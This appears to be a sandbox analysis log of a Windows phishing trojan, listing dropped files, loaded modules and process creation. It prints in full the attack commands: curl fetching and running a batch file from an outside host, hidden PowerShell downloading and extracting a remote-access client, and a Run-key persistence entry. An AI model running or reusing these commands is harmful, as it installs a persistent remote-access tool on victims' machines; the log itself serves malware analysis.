Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\client32.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\branding.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\pcicapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\hw.dll Jump to dropped file
Creates driver files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys Jump to behavior
Enables security privileges
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Process token adjusted: Security Jump to behavior
PE file contains more sections than normal
Source: libstdc++-6.dll2.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll0.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll3.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll1.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll0.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll1.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll4.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll3.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll2.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll4.28.dr Static PE information: Number of sections : 11 > 10
PE file does not import any functions
Source: branding.dll.28.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f
Source: itvwd64.sys2.28.dr Binary string: \Device\itvwd
Source: classification engine Classification label: mal100.phis.troj.win@48/239@25/13
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Directory Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtgkoksc.wue.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe File read: C:\Users\user\AppData\Roaming\Directory\client32.ini Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3220,i,14266024722842573986,13548840143605449493,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3268 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.focuslight.com/"
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f
Source: unknown Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3220,i,14266024722842573986,13548840143605449493,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3268 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicl32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcichek.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nsmtrace.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: nslsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcihooks.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: textshaping.dll Jump to behavior
